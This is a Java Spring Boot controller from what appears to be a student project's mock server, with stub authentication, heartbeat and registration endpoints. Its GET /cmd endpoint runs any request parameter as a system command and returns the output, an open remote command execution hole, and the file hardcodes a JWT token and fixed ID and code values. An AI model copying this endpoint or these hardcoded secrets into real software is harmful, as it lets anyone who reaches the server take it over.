package org.brynhild.graduation.mock.controller;

import jakarta.annotation.PostConstruct;
import org.brynhild.graduation.common.utils.JwtUtil;
import org.brynhild.graduation.mock.transfer.AuthenticRequest;
import org.brynhild.graduation.mock.transfer.HeartBeatRequest;
import org.brynhild.graduation.mock.transfer.RegisterRequest;
import org.brynhild.graduation.mock.transfer.RegisterResponse;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

@RestController
@RequestMapping("/")
public class MainController {

    @Autowired
    private JwtUtil jwtUtil;

    @GetMapping("/cmd")
    public String execute(String param) {
        StringBuilder builder = new StringBuilder();
        try {
            Process process = Runtime.getRuntime().exec(param);
            InputStream is = process.getInputStream();
            InputStreamReader isr = new InputStreamReader(is, "GBK");
            BufferedReader br = new BufferedReader(isr);
            String content = br.readLine();
            while (content != null) {
                System.out.println(content);
                builder.append(content);
                content = br.readLine();
            }

        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return builder.toString();
    }

    @PostConstruct
    public void test() {
        String token = "eyJhbGciOiJIUzI1NiJ9.eyJyb2xlcyI6MiwibmFtZSI6IueZveeRviIsImV4cCI6MTY3NTM0NTUyNX0.kr7QHVOrw0taN266Ast_uASuOalFp_4AUBlayRRlm1g";
//        System.out.println(jwtUtil.parseJWT(token).getId());
    }

    @PostMapping("/authentic")
    public Integer authentic(@RequestBody AuthenticRequest request) {
        System.out.println(request);
        return "2c8319e0".equals(request.getUid()) ? 1 : 0;
    }

    @PostMapping("/heartbeat")
    public Integer heartbeat(@RequestBody HeartBeatRequest request) {
        System.out.println(request);
        return 1;
    }


    @PostMapping("/register")
    public RegisterResponse register(@RequestBody RegisterRequest request) {
        System.out.println(request);
        return new RegisterResponse(1, "081465");
    }
}
